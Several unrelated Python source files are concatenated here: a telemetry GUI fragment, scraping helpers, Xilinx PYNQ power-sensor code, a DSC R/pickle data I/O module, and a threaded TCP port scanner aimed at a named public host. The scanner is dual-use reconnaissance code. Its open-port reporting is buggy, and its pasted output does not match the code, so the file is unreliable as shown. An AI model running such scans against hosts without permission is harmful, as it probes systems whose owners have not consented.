self.sock=client_sock.ClientSocket(server,port)
#
# Register the GUI with the server
self.lock.acquire()
self.sock.send("Register GUI\n")
self.lock.release()
except IOError:
str = "EXCEPTION: Could not connect to socket at host addr %s, port %s" % (server, port)
# update status
self.status.config(text=str, fg="red")
self.connect_bt.config(text="Disconnected", fg="black")
self.sock = None
return
if self.thread.daemon == False:
# create background listener thread
self.thread = threading.Thread(target=self.enqueue_output, args=(self.sock, self.queue))
# thread dies with the program
self.thread.daemon = True
# state listener thread here
self.thread.start()
if self.thread2.daemon == False:
# create background sim data generator thread
self.thread2 = threading.Thread(target=self.enqueue_sim_output, args=(self.sock, self.queue2))
# thread dies with the program
self.thread2.daemon = True
# start simulation thread here
self.thread2.start()
# update status
self.status.config(text=str, fg="red")
self.connect_bt.config(text="Connected", fg="red")
def clear(self):
"""
Clear all plots
"""
#if self.thread.isAlive() == True:
# self.status.config(text="LISTENER THREAD IS ALIVE!",fg="red")
# return
self.i = 0
self.axis.cla()
self.label_plot()
self.fig.canvas.draw()
self.status.config(text="Cleared plot areas.",fg="black")
self.fig.canvas.draw()
self.display.clear()
def updatePlots(self, n, x, y):
"""
Update plot with new point
"""
fmt = self.plot_fmt[0]
fmt2 = self.plot_fmt[1]
if n % 50.0 == 0:
self.axis.set_xlim(n, n+50.0)
self.axis.plot(n,x,fmt)
self.axis.plot(n,y,fmt2)
#
# Update figure here
self.fig.canvas.draw()
def decode_telm(self, bmsg):
"""
Decode APP telemetry here and return a tuple.
"""
if bmsg[:4] == "List":
bmsg = bmsg.split(" ")
print "---Server connected to %s" % bmsg[1]
self.display.insert(END, "---Server connected to %s\n" % bmsg[1], "blue")
return []
l = len(bmsg)
msg = struct.unpack(">" + "%d" % l + "s",bmsg)
#print msg
#tid = struct.unpack(">i",msg[0][-5:-1])[0]
tid = struct.unpack(">i",msg[0][-4:])[0]
if tid == 1:
args = struct.unpack("3f",msg[0][:-4])
print "--- (raw tlm ARSDATA) %f, %f, %f\n" % args
self.display.insert(END, "--- (raw tlm ARSDATA) %f, %f, %f\n" % args, "ans")
l = [tid, args[0],args[1],args[2]]
elif tid == 2:
args = struct.unpack("2f",msg[0][:-4])
print "--- (raw tlm FSMDATA) %f, %f\n" % args
self.display.insert(END, "--- (raw tlm FSMDATA) %f, %f\n" % args, "ans")
l = [tid, args[0],args[1]]
elif tid == 3:
args = struct.unpack("f",msg[0][:-4])
print "--- (raw tlm PARAMDATA) %f\n" % args[0]
self.display.insert(END, "--- (raw tlm PARAMDATA) %f\n" % args, "ans")
l = [tid, args[0]]
elif tid == 4:
m = msg[0][0:80]
args = struct.unpack("80s",m)
print "--- (State Data) %s\n" % args
self.display.insert(END, "--- (State Data) %s\n\n" % args, "ans")
self.display.insert(END, "\n")
l = [tid, args]
else:
print "Unrecognized telemetry id = %d\n" % tid
self.display.insert(END, "ERROR: Unrecognized telemetry id = %d\n" % tid, "ans")
l = []
self.display.see(END)
#print "Id is %d, msg is %s, args is %s" % (tid,msg,args)
return l
def update_task(self):
"""
Update telemetry and plots from socket here...
"""
time_period = 20
time_period_no_output = 200
# read line without blocking
try:
msg = self.queue.get_nowait()
#print msg
msg = self.decode_telm(msg)
if len(msg) > 0:
if msg[0] == 2:
n = self.i
x = msg[1]
y = msg[2]
self.updatePlots(n, x, y)
self.i += 1
if msg[0] == 4:
state = msg[1][0].split(":")
e = state[1].split(" ")[-1].strip("\x00")
s1 = state[0]
s2 = state[1].strip(" "+e).replace(" ","")
s2 = s2.strip("\x00")
s2 = s2.strip("ENTRY")
s2 = s2.strip("EXIT")
state = s2 + ":" + s1
#
if e == "EXIT":
self.mode_mgr_sm_win.ExitState(state)
if e == "ENTRY":
self.mode_mgr_sm_win.EnterState(state)
#
except Queue.Empty:
#print('no output yet')
self.root.after(time_period_no_output, self.update_task)
return
# ... do something with line
#
self.mode_mgr_sm_win.win.update_idletasks()
self.root.update_idletasks()
self.root.after(time_period, self.update_task)
return
if __name__ == '__main__':
root = Tk()
root.option_add('*Font', 'Verdana 10')
root.title('Multi-Partition Demo Commander and Telmetry Monitor')
p = Plotter(root)
root.after(200, p.update_task)
root.mainloop()
|
utils.py
|
import requests
import ConfigParser
from bs4 import BeautifulSoup
from time import sleep
from clint.textui import progress
import os, sys, itertools
from threading import Thread
from logs import *
def ip_address():
"""
Gets current IP address
"""
response = requests.get('http://www.ip-addr.es')
print '[-] GET {0} | {1}'.format(response.status_code, response.url)
log_info('[+] ip address is: {0}'.format(response.text.strip()))
def config_file(path):
"""
Reads configuration file
"""
if not os.path.exists(path):
raise IOError('file not found!')
log_info('[+] configuration file: {0}'.format(path))
config = ConfigParser.ConfigParser()
config.read(path)
return config
def make_soup(response, debug=False):
"""
Makes soup from response
"""
print '[*] fetching url... {0} | {1}'.format(response.status_code, response.url)
soup = BeautifulSoup(response.text, 'html5lib')
if debug:
print soup.prettify().encode('utf-8')
return soup
def wait(delay):
if delay > 0:
print '[-] going to sleep {0} seconds'.format(delay)
sleep(delay)
def download_file(r, url, directory, filename):
"""
Downloads file with progress bar
"""
if not os.path.exists(directory):
# creates directories recursively
os.makedirs(directory)
log_info('[+] created new directory: ' + directory)
filename = filename.replace(':', '-')
path = os.path.join(directory, filename)
print '[-] downloading file from url: {0}'.format(url)
response = r.get(url, stream=True)
with open(path, 'wb') as f:
total_length = int(response.headers.get('content-length'))
for chunk in progress.bar(response.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):
if chunk:
f.write(chunk)
f.flush()
log_success('[+] new download: {0}'.format(path))
return path
def thread_loader(function):
"""
Starts a thread with loading bar
"""
thread = Thread(target=function)
thread.start()
spinner = itertools.cycle(['-', '/', '|', '\\'])
while thread.is_alive():
sys.stdout.write(spinner.next())
sys.stdout.flush()
# erase the last written char
sys.stdout.write('\b')
|
threaded_portscan.py
|
"""Scan ports."""
import socket
import threading
from queue import Queue
host = 'pythonprogramming.net'
def portscan(host, port):
"""Scan ports."""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
con = s.connect((host, port))
print('>>>', port, 'is open')
con.close()
except Exception:
pass
# print('...', port)
def threader():
"""Thread generator."""
while True:
worker = q.get()
portscan(host, worker)
q.task_done()
q = Queue()
for x in range(100):
t = threading.Thread(target=threader)
t.daemon = True
t.start()
for worker in range(1, 10001):
q.put(worker)
q.join()
"""
... 27
... 26
... 24
... 23
... 19
... 8
... 17
... 18
... 4
... 13
... 9
... 7
... 20
... 14
... 10
Port 22 is open
... 22
... 5
... 21
... 15
... 11
... 16
... 28
... 12
... 2
... 3
... 6
... 25
... 1
... 29
... 30
... 31
... 41
... 39
... 37
... 40
... 36
... 35
... 34
... 38
... 52
... 50
... 42
... 47
... 51
... 49
... 55
... 44
... 54
... 33
... 45
... 56
... 48
... 32
... 46
... 43
... 53
... 57
... 58
... 59
... 60
... 72
... 68
... 71
... 70
... 67
... 66
... 69
... 64
... 65
Port 80 is open
... 80
... 62
... 63
... 81
... 77
... 76
... 75
... 78
... 86
... 82
... 74
... 84
... 79
... 83
... 85
... 73
... 87
... 61
... 88
... 89
... 90
... 93
... 92
... 91
... 96
... 95
... 98
... 94
... 97
... 100
... 99
"""
|
pmbus.py
|
# Copyright (c) 2021, Xilinx, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import cffi
import glob
import os
import threading
import time
import warnings
__author__ = "Peter Ogden"
__copyright__ = "Copyright 2021, Xilinx"
__email__ = "pynq_support@xilinx.com"
_c_header = R"""
extern const char *libsensors_version;
typedef struct sensors_bus_id {
short type;
short nr;
} sensors_bus_id;
typedef struct sensors_chip_name {
char *prefix;
sensors_bus_id bus;
int addr;
char *path;
} sensors_chip_name;
int sensors_init(FILE *input);
void sensors_cleanup(void);
int sensors_parse_chip_name(const char *orig_name, sensors_chip_name *res);
void sensors_free_chip_name(sensors_chip_name *chip);
int sensors_snprintf_chip_name(char *str, size_t size,
const sensors_chip_name *chip);
const char *sensors_get_adapter_name(const sensors_bus_id *bus);
typedef struct sensors_feature sensors_feature;
char *sensors_get_label(const sensors_chip_name *name,
const sensors_feature *feature);
int sensors_get_value(const sensors_chip_name *name, int subfeat_nr,
double *value);
int sensors_set_value(const sensors_chip_name *name, int subfeat_nr,
double value);
int sensors_do_chip_sets(const sensors_chip_name *name);
const sensors_chip_name *sensors_get_detected_chips(const sensors_chip_name
*match, int *nr);
typedef enum sensors_feature_type {
SENSORS_FEATURE_IN = 0x00,
SENSORS_FEATURE_FAN = 0x01,
SENSORS_FEATURE_TEMP = 0x02,
SENSORS_FEATURE_POWER = 0x03,
SENSORS_FEATURE_ENERGY = 0x04,
SENSORS_FEATURE_CURR = 0x05,
SENSORS_FEATURE_HUMIDITY = 0x06,
SENSORS_FEATURE_MAX_MAIN,
SENSORS_FEATURE_VID = 0x10,
SENSORS_FEATURE_INTRUSION = 0x11,
SENSORS_FEATURE_MAX_OTHER,
SENSORS_FEATURE_BEEP_ENABLE = 0x18,
SENSORS_FEATURE_MAX,
SENSORS_FEATURE_UNKNOWN = 0x7fffffff,
} sensors_feature_type;
typedef enum sensors_subfeature_type {
SENSORS_SUBFEATURE_IN_INPUT = 0,
SENSORS_SUBFEATURE_IN_MIN,
SENSORS_SUBFEATURE_IN_MAX,
SENSORS_SUBFEATURE_IN_LCRIT,
SENSORS_SUBFEATURE_IN_CRIT,
SENSORS_SUBFEATURE_IN_AVERAGE,
SENSORS_SUBFEATURE_IN_LOWEST,
SENSORS_SUBFEATURE_IN_HIGHEST,
SENSORS_SUBFEATURE_IN_ALARM = 0x80,
SENSORS_SUBFEATURE_IN_MIN_ALARM,
SENSORS_SUBFEATURE_IN_MAX_ALARM,
SENSORS_SUBFEATURE_IN_BEEP,
SENSORS_SUBFEATURE_IN_LCRIT_ALARM,
SENSORS_SUBFEATURE_IN_CRIT_ALARM,
SENSORS_SUBFEATURE_FAN_INPUT = 0x100,
SENSORS_SUBFEATURE_FAN_MIN,
SENSORS_SUBFEATURE_FAN_MAX,
SENSORS_SUBFEATURE_FAN_ALARM = 0x180,
SENSORS_SUBFEATURE_FAN_FAULT,
SENSORS_SUBFEATURE_FAN_DIV,
SENSORS_SUBFEATURE_FAN_BEEP,
SENSORS_SUBFEATURE_FAN_PULSES,
SENSORS_SUBFEATURE_FAN_MIN_ALARM,
SENSORS_SUBFEATURE_FAN_MAX_ALARM,
SENSORS_SUBFEATURE_TEMP_INPUT = 0x200,
SENSORS_SUBFEATURE_TEMP_MAX,
SENSORS_SUBFEATURE_TEMP_MAX_HYST,
SENSORS_SUBFEATURE_TEMP_MIN,
SENSORS_SUBFEATURE_TEMP_CRIT,
SENSORS_SUBFEATURE_TEMP_CRIT_HYST,
SENSORS_SUBFEATURE_TEMP_LCRIT,
SENSORS_SUBFEATURE_TEMP_EMERGENCY,
SENSORS_SUBFEATURE_TEMP_EMERGENCY_HYST,
SENSORS_SUBFEATURE_TEMP_LOWEST,
SENSORS_SUBFEATURE_TEMP_HIGHEST,
SENSORS_SUBFEATURE_TEMP_MIN_HYST,
SENSORS_SUBFEATURE_TEMP_LCRIT_HYST,
SENSORS_SUBFEATURE_TEMP_ALARM = 0x280,
SENSORS_SUBFEATURE_TEMP_MAX_ALARM,
SENSORS_SUBFEATURE_TEMP_MIN_ALARM,
SENSORS_SUBFEATURE_TEMP_CRIT_ALARM,
SENSORS_SUBFEATURE_TEMP_FAULT,
SENSORS_SUBFEATURE_TEMP_TYPE,
SENSORS_SUBFEATURE_TEMP_OFFSET,
SENSORS_SUBFEATURE_TEMP_BEEP,
SENSORS_SUBFEATURE_TEMP_EMERGENCY_ALARM,
SENSORS_SUBFEATURE_TEMP_LCRIT_ALARM,
SENSORS_SUBFEATURE_POWER_AVERAGE = 0x300,
SENSORS_SUBFEATURE_POWER_AVERAGE_HIGHEST,
SENSORS_SUBFEATURE_POWER_AVERAGE_LOWEST,
SENSORS_SUBFEATURE_POWER_INPUT,
SENSORS_SUBFEATURE_POWER_INPUT_HIGHEST,
SENSORS_SUBFEATURE_POWER_INPUT_LOWEST,
SENSORS_SUBFEATURE_POWER_CAP,
SENSORS_SUBFEATURE_POWER_CAP_HYST,
SENSORS_SUBFEATURE_POWER_MAX,
SENSORS_SUBFEATURE_POWER_CRIT,
SENSORS_SUBFEATURE_POWER_AVERAGE_INTERVAL = 0x380,
SENSORS_SUBFEATURE_POWER_ALARM,
SENSORS_SUBFEATURE_POWER_CAP_ALARM,
SENSORS_SUBFEATURE_POWER_MAX_ALARM,
SENSORS_SUBFEATURE_POWER_CRIT_ALARM,
SENSORS_SUBFEATURE_ENERGY_INPUT = 0x400,
SENSORS_SUBFEATURE_CURR_INPUT = 0x500,
SENSORS_SUBFEATURE_CURR_MIN,
SENSORS_SUBFEATURE_CURR_MAX,
SENSORS_SUBFEATURE_CURR_LCRIT,
SENSORS_SUBFEATURE_CURR_CRIT,
SENSORS_SUBFEATURE_CURR_AVERAGE,
SENSORS_SUBFEATURE_CURR_LOWEST,
SENSORS_SUBFEATURE_CURR_HIGHEST,
SENSORS_SUBFEATURE_CURR_ALARM = 0x580,
SENSORS_SUBFEATURE_CURR_MIN_ALARM,
SENSORS_SUBFEATURE_CURR_MAX_ALARM,
SENSORS_SUBFEATURE_CURR_BEEP,
SENSORS_SUBFEATURE_CURR_LCRIT_ALARM,
SENSORS_SUBFEATURE_CURR_CRIT_ALARM,
SENSORS_SUBFEATURE_HUMIDITY_INPUT = 0x600,
SENSORS_SUBFEATURE_VID = 0x1000,
SENSORS_SUBFEATURE_INTRUSION_ALARM = 0x1100,
SENSORS_SUBFEATURE_INTRUSION_BEEP,
SENSORS_SUBFEATURE_BEEP_ENABLE = 0x1800,
SENSORS_SUBFEATURE_UNKNOWN = 0x7fffffff,
} sensors_subfeature_type;
struct sensors_feature {
char *name;
int number;
sensors_feature_type type;
int first_subfeature;
int padding1;
};
typedef struct sensors_subfeature {
char *name;
int number;
sensors_subfeature_type type;
int mapping;
unsigned int flags;
} sensors_subfeature;
const sensors_feature *
sensors_get_features(const sensors_chip_name *name, int *nr);
const sensors_subfeature *
sensors_get_all_subfeatures(const sensors_chip_name *name,
const sensors_feature *feature, int *nr);
const sensors_subfeature *
sensors_get_subfeature(const sensors_chip_name *name,
const sensors_feature *feature,
sensors_subfeature_type type);
"""
_ffi = cffi.FFI()
try:
_ffi.cdef(_c_header)
_lib = _ffi.dlopen("libsensors.so")
except Exception as e:
_lib = None
class SysFSSensor:
def __init__(self, path, unit, name, scale):
self._path = path
self._unit = unit
self.name = name
self._scale = scale
self.parents = tuple()
@property
def value(self):
with open(self._path, "r") as f:
raw_value = float(f.read())
return raw_value * self._scale
def get_value(self, parents=None):
return self.value
def __repr__(self):
return "Sensor {{name={}, value={}{}}}".format(
self.name, self.value, self._unit)
class DerivedPowerSensor:
def __init__(self, name, voltage, current):
parents = (voltage, current)
self.voltage_sensor = voltage
self.current_sensor = current
self.name = name
self.parents = (voltage, current)
def get_value(self, parents=None):
if parents is None:
return self.voltage_sensor.value * self.current_sensor.value
else:
return parents[0] * parents[1]
@property
def value(self):
return self.get_value()
def __repr__(self):
return "Sensor {{name={}, value={}W}}".format(
self.name, self.value)
class Sensor:
"""Interacts with a sensor exposed by libsensors
The value of the sensor is determined by the unit of the
underlying sensor API - that is generally Volts for potential
difference, Amperes for current, Watts for power and degrees
Centigrade for temperature
Attributes
----------
name : str
The name of the sensor
value : float
The current value of the sensor
"""
def __init__(self, chip, number, unit, name):
"""Create a new sensor object wrapping a libsensors chip and feature
Parameters
----------
chip : FFI sensors_chip_name*
The chip the sensor is on
number : int
The number of sensor on the chip
unit : str
Unit to append to the value when creating a string representation
name : str
Name of the sensor
"""
self._chip = chip
self._number = number
self._value = _ffi.new("double [1]")
self._unit = unit
self.name = name
self.parents = tuple()
@property
def value(self):
"""Read the current value of the sensor
"""
if _lib:
_lib.sensors_get_value(self._chip, self._number, self._value)
return self._value[0]
else:
return 0
def get_value(self, parents=None):
return self.value
def __repr__(self):
return "Sensor {{name={}, value={}{}}}".format(
self.name, self.value, self._unit)
class Rail:
"""Bundles up to three sensors monitoring the same power rail
Represents a power rail in the system monitored by up to three
sensors for voltage, current and power.
Attributes
----------
name : str
Name of the power rail
voltage : Sensor or None
Voltage sensor for the rail or None if not available
current : Sensor or None
Current sensor for the rail or None if not available
power : Sensor or None
Power sensor for the rail or None if not available
"""
def __init__(self, name):
"""Create a new Rail with the specified rail
"""
self.name = name
self.voltage = None
self.current = None
self.power = None
def __repr__(self):
args = ["name=" + self.name]
if self.voltage:
args.append("voltage=" + repr(self.voltage))
if self.current:
args.append("current=" + repr(self.current))
if self.power:
args.append("power=" + repr(self.power))
return "Rail {{{}}}".format(', '.join(args))
class XrtInfoDump:
def __init__(self, device):
self._device = device
self.parents = tuple()
def get_value(self, parents=None):
info = self._device.device_info
return {
"0v85_v": info.m0v85,
"12v_aux_v": info.m12VAux,
"12v_aux_i": info.mAuxCurr,
"12v_pex_v": info.m12VPex,
"12v_pex_i": info.mPexCurr,
"12v_sw_v": info.m12vSW,
"1v8_v": info.m1v8Top,
"3v3_aux_v": info.m3v3Aux,
"3v3_pex_v": info.m3v3Pex,
"mgt0v9avcc_v": info.mMgt0v9,
"mgtavtt_v": info.mMgtVtt,
"sys_5v5_v": info.mSys5v5,
"vccint_v": info.mVccIntVol,
"vccint_i": info.mCurrent
}
class XrtSensor:
def __init__(self, unit, name, scale, parent, field):
self.parents = (parent,)
self._unit = unit
self.name = name
self._scale = scale
self._field = field
def get_value(self, parents=None):
if parents is None:
parents = (self.parents[0].get_value(),)
return parents[0][self._field] * self._scale
@property
def value(self):
return self.get_value()
def __repr__(self):
return "Sensor {{name={}, value={}{}}}".format(
self.name, self.value, self._unit)
class XrtRail:
def __init__(self, name, sample_dict, parent):
self.name = name
if name + "_v" in sample_dict:
self.voltage = XrtSensor("V", name + "_vol", 0.001, parent, name + "_v")
else:
self.voltage = None
if name + "_i" in sample_dict:
self.current = XrtSensor("A", name + "_curr", 0.001, parent, name + "_i")
else:
self.current = None
if self.voltage and self.current:
self.power = DerivedPowerSensor(name + "_power",
self.voltage, self.current)
else:
self.power = None
def __repr__(self):
args = ["name=" + self.name]
if self.voltage:
args.append("voltage=" + repr(self.voltage))
if self.current:
args.append("current=" + repr(self.current))
if self.power:
args.append("power=" + repr(self.power))
return "XrtRail {{{}}}".format(', '.join(args))
def get_xrt_sysfs_rails(device=None):
if device is None:
from pynq.pl_server import Device
device = Device.active_device
rail_names = ["0v85", "12v_aux", "12v_pex", "12v_sw", "1v8", "3v3_aux",
"3v3_pex", "mgt0v9avcc", "mgtavtt", "sys_5v5", "vccint" ]
infodump = XrtInfoDump(device)
sample_dict = infodump.get_value()
rails = {}
for n in rail_names:
rails[n] = XrtRail(n, sample_dict, infodump)
return rails
def _enumerate_sensors(config_file=None):
if _lib is None:
warnings.warn("Could not initialise libsensors library")
return {}
if config_file:
with open(config_file, 'r') as handle:
_lib.sensors_init(handle);
else:
_lib.sensors_init(_ffi.NULL)
chip_nr = _ffi.new("int [1]")
feature_nr = _ffi.new("int [1]")
rails = {}
chip_nr[0] = 0
cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr)
while cn:
feature_nr[0] = 0
feature = _lib.sensors_get_features(cn, feature_nr)
while feature:
name = _ffi.string(_lib.sensors_get_label(cn, feature)).decode()
subfeature = None
if feature.type == _lib.SENSORS_FEATURE_POWER:
subfeature = _lib.sensors_get_subfeature(
cn, feature, _lib.SENSORS_SUBFEATURE_POWER_INPUT)
feature_type = "power"
unit = "W"
elif feature.type == _lib.SENSORS_FEATURE_IN:
subfeature = _lib.sensors_get_subfeature(
cn, feature, _lib.SENSORS_SUBFEATURE_IN_INPUT)
feature_type = "voltage"
unit = "V"
elif feature.type == _lib.SENSORS_FEATURE_CURR:
subfeature = _lib.sensors_get_subfeature(
cn, feature, _lib.SENSORS_SUBFEATURE_CURR_INPUT)
feature_type = "current"
unit = "A"
if subfeature:
if name not in rails:
rails[name] = Rail(name)
setattr(rails[name], feature_type,
Sensor(cn, subfeature.number, unit, "{}_{}".format(
name, feature_type)))
feature = _lib.sensors_get_features(cn, feature_nr)
cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr)
return rails
def get_rails(config_file=None):
"""Returns a dictionary of power rails
Parameters
----------
config_file : str
Path to a configuration file for libsensors to use
in place of the the system-wide default
Returns
-------
dict {str : Rail}
Dictionary of power rails with the name of the rail as
the key and a Rail object as the value
"""
return _enumerate_sensors(config_file)
class MultiSensor:
"""Class for efficiently collecting the readings from multiple sensors
"""
def __init__(self, sensors):
self._sensors = sensors
def get_values(self):
stored = {}
return tuple((self._get_value(s, stored) for s in self._sensors))
def _get_value(self, sensor, stored):
if sensor in stored:
return stored[sensor]
value = sensor.get_value([self._get_value(p, stored) for p in sensor.parents])
stored[sensor] = value
return value
class DataRecorder:
"""Class to record sensors during an execution
The DataRecorder provides a way of recording sensor data using a
`with` block.
"""
def __init__(self, *sensors):
"""Create a new DataRecorder attached to the specified sensors
"""
import pandas as pd
self._record_index = -1
self._sensors = sensors
self._getter = MultiSensor(sensors)
self._columns = ['Mark']
self._times = []
self._columns.extend([s.name for s in sensors])
self._frame = pd.DataFrame(columns=self._columns,
index = pd.DatetimeIndex([]),
dtype='f4')
self._callbacks = []
self._data = []
self._thread = None
def __del__(self):
if self._thread:
self.stop()
def reset(self):
"""Clear the internal state of the data recorder without
forgetting which sensors to record
"""
self._frame.drop(self._frame.index, inplace=True)
self._record_index = -1
def record(self, interval):
"""Start recording
"""
if self._thread:
raise RuntimeError("DataRecorder is already recording")
self._thread = threading.Thread(
target=DataRecorder._thread_func, args=[self])
self._interval = interval
self._done = False
self._record_index += 1
self._thread.start()
return self
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.stop()
return
def stop(self):
"""Stops recording
"""
self._done = True
self._thread.join()
self._thread = None
def mark(self):
"""Increment the Invocation count
"""
self._record_index += 1
return self._record_index
def _thread_func(self):
import pandas as pd
while not self._done:
row = [self._record_index]
row.extend(self._getter.get_values())
self._frame.loc[pd.Timestamp.now()] = row
time.sleep(self._interval)
@property
def frame(self):
"""Return a pandas DataFrame of the recorded data
The frame consists of the following fields
Index : The timestamp of the measurement
Mark : counts the number of times that record or mark was called
Sensors* : one column per sensor
"""
return self._frame
|
dsc_io.py
|
#!/usr/bin/env python
__author__ = "Gao Wang"
__copyright__ = "Copyright 2016, Stephens lab"
__email__ = "gaow@uchicago.edu"
__license__ = "MIT"
'''
Test rpy2 installation:
python -m 'rpy2.tests'
'''
from dsc.utils import flatten_list
def load_mpk(mpk_files, jobs=2):
import msgpack, collections
from multiprocessing import Process, Manager
from .utils import chunks
if isinstance(mpk_files, str):
return msgpack.unpackb(open(mpk_files, "rb").read(),
raw=False,
object_pairs_hook=collections.OrderedDict)
d = Manager().dict()
def f(d, x):
for xx in x:
d.update(
msgpack.unpackb(open(xx, "rb").read(),
raw=False,
object_pairs_hook=collections.OrderedDict))
#
mpk_files = [x for x in chunks(mpk_files, int(len(mpk_files) / jobs) + 1)]
job_pool = [Process(target=f, args=(d, x)) for x in mpk_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return collections.OrderedDict([
(x, d[x]) for x in sorted(d.keys(), key=lambda x: int(x.split(':')[0]))
])
def load_rds(filename, types=None):
import os
import pandas as pd, numpy as np
import rpy2.robjects as RO
import rpy2.robjects.vectors as RV
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
def load(data, types, rpy2_version=3):
if types is not None and not isinstance(data, types):
return np.array([])
# FIXME: I'm not sure if I should keep two versions here
# rpy2_version 2.9.X is more tedious but it handles BoolVector better
# rpy2 version 3.0.1 converts bool to integer directly without dealing with
# NA properly. It gives something like (0,1,-234235).
# Possibly the best thing to do is to open an issue for it to the developers.
if rpy2_version == 2:
# below works for rpy2 version 2.9.X
if isinstance(data, RI.RNULLType):
res = None
elif isinstance(data, RV.BoolVector):
data = RO.r['as.integer'](data)
res = np.array(data, dtype=int)
# Handle c(NA, NA) situation
if np.sum(np.logical_and(res != 0, res != 1)):
res = res.astype(float)
res[res < 0] = np.nan
res[res > 1] = np.nan
elif isinstance(data, RV.FactorVector):
data = RO.r['as.character'](data)
res = np.array(data, dtype=str)
elif isinstance(data, RV.IntVector):
res = np.array(data, dtype=int)
elif isinstance(data, RV.FloatVector):
res = np.array(data, dtype=float)
elif isinstance(data, RV.StrVector):
res = np.array(data, dtype=str)
elif isinstance(data, RV.DataFrame):
res = pd.DataFrame(data)
elif isinstance(data, RV.Matrix):
res = np.matrix(data)
elif isinstance(data, RV.Array):
res = np.array(data)
else:
# I do not know what to do for this
# But I do not want to throw an error either
res = str(data)
else:
if isinstance(data, RI.NULLType):
res = None
else:
res = data
if isinstance(res, np.ndarray) and res.shape == (1, ):
res = res[0]
return res
def load_dict(res, data, types):
'''load data to res'''
names = data.names if not isinstance(data.names, RI.NULLType) else [
i + 1 for i in range(len(data))
]
for name, value in zip(names, list(data)):
if isinstance(value, RV.ListVector):
res[name] = {}
res[name] = load_dict(res[name], value, types)
else:
res[name] = load(value, types)
return res
#
if not os.path.isfile(filename):
raise IOError('Cannot find file ``{}``!'.format(filename))
rds = RO.r['readRDS'](filename)
if isinstance(rds, RV.ListVector):
res = load_dict({}, rds, types)
else:
res = load(rds, types)
return res
def save_rds(data, filename):
import collections, re
import pandas as pd
import numpy as np
import rpy2.robjects as RO
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
# Supported data types:
# int, float, str, tuple, list, numpy array
# numpy matrix and pandas dataframe
int_type = (int, np.int8, np.int16, np.int32, np.int64)
float_type = (float, np.float)
def assign(name, value):
name = re.sub(r'[^\w' + '_.' + ']', '_', name)
if isinstance(value, (tuple, list)):
if all(isinstance(item, int_type) for item in value):
value = np.asarray(value, dtype=int)
elif all(isinstance(item, float_type) for item in value):
value = np.asarray(value, dtype=float)
else:
value = np.asarray(value)
if isinstance(value, np.matrix):
value = np.asarray(value)
if isinstance(
value,
tuple(flatten_list((str, float_type, int_type, np.ndarray)))):
if isinstance(value, np.ndarray) and value.dtype.kind == "u":
value = value.astype(int)
RO.r.assign(name, value)
elif isinstance(value, pd.DataFrame):
# FIXME: does not always work well for pd.DataFrame
RO.r.assign(name, value)
elif value is None:
RO.r.assign(name, RI.NULL)
else:
raise ValueError(
"Saving ``{}`` to RDS file is not supported!".format(
str(type(value))))
#
def assign_dict(name, value):
RO.r('%s <- list()' % name)
for k, v in value.items():
k = re.sub(r'[^\w' + '_.' + ']', '_', str(k))
if k.isdigit():
k = str(k)
if isinstance(v, collections.Mapping):
assign_dict('%s$%s' % (name, k), v)
else:
assign('item', v)
RO.r('%s$%s <- item' % (name, k))
#
if isinstance(data, collections.Mapping):
assign_dict('res', data)
else:
assign('res', data)
RO.r("saveRDS(res, '%s')" % filename)
def load_dsc(infiles):
import pickle, yaml
if isinstance(infiles, str):
infiles = [infiles]
res = dict()
for infile in infiles:
if infile.endswith('.pkl'):
data = pickle.load(open(infile, 'rb'))
elif infile.endswith('.rds'):
data = load_rds(infile)
elif infile.endswith('.yml'):
data = yaml.safe_load(open(infile).read())
else:
raise ValueError(f'``{infile}`` is not supported DSC data format')
try:
res.update(data)
except Exception:
# loaded a non-recursive object
return data
return res
def convert_dsc(pkl_files, jobs=2):
import pickle
from multiprocessing import Process
from .utils import chunks
def convert(d):
for ff in d:
if not ff.endswith('pkl'):
raise ValueError(f'``{ff}`` is not supported DSC data format')
save_rds(pickle.load(open(ff, 'rb')), ff[:-4] + '.rds')
#
if isinstance(pkl_files, str):
convert([pkl_files])
return 0
#
pkl_files = [x for x in chunks(pkl_files, int(len(pkl_files) / jobs) + 1)]
job_pool = [Process(target=convert, args=(x, )) for x in pkl_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return 0
def symlink_force(target, link_name):
import os, errno
try:
os.symlink(target, link_name)
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(link_name)
os.symlink(target, link_name)
else:
raise e
def csv_to_html(infile, outfile):
import os
import pandas as pd
pd.set_option('display.max_colwidth', -1)
from dsc.constant import TABLE_HEADER
